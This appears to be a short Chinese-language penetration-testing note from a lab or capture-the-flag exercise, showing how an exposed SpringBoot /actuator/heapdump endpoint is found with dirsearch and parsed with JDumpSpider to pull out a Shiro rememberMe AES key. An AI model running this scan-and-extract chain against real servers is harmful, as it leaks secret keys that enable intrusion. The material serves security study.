Heapdump

1. 介绍:

常见于SpringBoot框架,通过获取heapdump,对其解析从中获取敏感信息(如ShiroKey)
GreatWall > 3.1. SpringBoot heapdump

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# dirsearch -u http://172.28.23.33:8080/ -x 403,404

Target: http://172.28.23.33:8080/

[02:13:52] Starting:
[02:13:57] 200 -    2KB - /actuator
[02:13:57] 200 -   82KB - /actuator/threaddump
[02:13:58] 200 -   29MB - /actuator/heapdump
Task Completed

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================

===========================================
CookieRememberMeManager(ShiroKey)-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

===========================================

Pasted image 20260121152208.png